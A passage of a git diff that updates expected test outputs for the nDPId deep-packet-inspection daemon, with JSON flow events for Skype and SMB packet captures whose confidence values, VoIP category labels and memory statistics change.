-00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00583{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","packets-captured":2146,"packets-processed":2079,"total-skipped-flows":0,"total-l4-payload-len":359672,"total-not-detected-flows":45,"total-guessed-flows":22,"total-detected-flows":200,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":267,"total-idle-flows":267,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1293,"global_ts_msec":1431970708726} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00583{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","packets-captured":2146,"packets-processed":2079,"total-skipped-flows":0,"total-l4-payload-len":359672,"total-not-detected-flows":45,"total-guessed-flows":22,"total-detected-flows":200,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":267,"total-idle-flows":267,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1296,"global_ts_msec":1431970708726} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2146/2079 ~~ skipped flows.............: 0 @@ -1299,9 +1302,9 @@ ~~ total active/idle flows...: 267/267 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6440928 bytes -~~ total memory freed........: 6440928 bytes -~~ total allocations/frees...: 121365/121365 +~~ total memory allocated....: 6506571 bytes +~~ total memory freed........: 6506571 bytes +~~ total allocations/frees...: 124102/124102 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 197 chars ~~ json string max len.......: 1776 chars diff --git a/test/results/skype_udp.pcap.out b/test/results/skype_udp.pcap.out index a7f55f9ef..c2e92dbd6 100644 --- a/test/results/skype_udp.pcap.out +++ b/test/results/skype_udp.pcap.out @@ -3,9 +3,9 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1156534494734,"flow_last_seen":1156534494734,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1156534494734,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1156534494734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1156534494734,"pkt":"ABbjGScVAAR2lnvaCABFAAA7AABAAEARoZLAqAECGOC+lYyWmV4AJ5lYFpcCrtEAh3kuASsbNLlPtKfPLsSj70vZ59IfZD23vQ=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1156534496782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1156534496782,"pkt":"ABbjGScVAAR2lnvaCABFAAA7AABAAEARoZLAqAECGOC+lYyWmV4AJ5lYFpcCqvCj5HkuAStybQoRs8uOXAH\/9ayvdzDWsfxVrg=="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1156534494734,"flow_last_seen":1156534496782,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1156534496782,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams","breed":"Acceptable"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1156534494734,"flow_last_seen":1156534496782,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1156534496782,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1156534500825,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1156534500825,"pkt":"ABbjGScVAAR2lnvaCABFAAA7AABAAEARoZLAqAECGOC+lYyWmV4AJ5lYFpcCvuoUBXkuASuSYOIkRaPfGbxEfOnC\/51D4o9Ncw=="} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1156534494734,"flow_last_seen":1156534567244,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1156534567244,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams","breed":"Acceptable"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1156534494734,"flow_last_seen":1156534567244,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1156534567244,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"skype_udp.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":129,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1156534567244} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 @@ -15,10 +15,10 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869588 bytes -~~ total memory freed........: 5869588 bytes -~~ total allocations/frees...: 118119/118119 +~~ total memory allocated....: 6003222 bytes +~~ total memory freed........: 6003222 bytes +~~ total allocations/frees...: 120881/120881 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars -~~ json string max len.......: 672 chars -~~ json string avg len.......: 560 chars +~~ json string max len.......: 690 chars +~~ json string avg len.......: 568 chars diff --git a/test/results/smb_deletefile.pcap.out b/test/results/smb_deletefile.pcap.out index f7adcd0f7..fac40c1c4 100644 --- a/test/results/smb_deletefile.pcap.out +++ b/test/results/smb_deletefile.pcap.out @@ -2,10 +2,10 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1584368315417} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7580000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 